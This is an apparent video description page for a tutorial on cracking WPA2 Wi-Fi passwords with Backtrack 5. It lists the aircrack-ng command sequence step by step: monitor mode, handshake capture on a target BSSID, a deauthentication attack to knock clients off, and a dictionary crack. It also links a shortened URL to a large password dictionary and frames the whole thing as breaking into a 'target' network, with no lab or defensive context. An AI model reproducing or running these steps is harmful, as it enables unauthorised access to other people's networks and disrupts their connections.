Cracking WPA2 Backtrack 5 (HD) HD
1. airmon-ng 2. airmon-ng start wlan0 3.airodump-ng mon0 4. airodump-ng -c (channel) -w (file name) --bssid (bssid) mon0 5. aireplay-ng -0 5 -a (BSSID) mon0 6. aircrack-ng (network name).cap -w (dictionary location) Sorry for not showing the crack..that will take more time .. but if your target password in the dictionary file .. then aircrack-ng will find it for sure !! 1.1 MILLIONS WORD DICTIONARY. http://adf.ly/aue6E
Похожие видео
Показать еще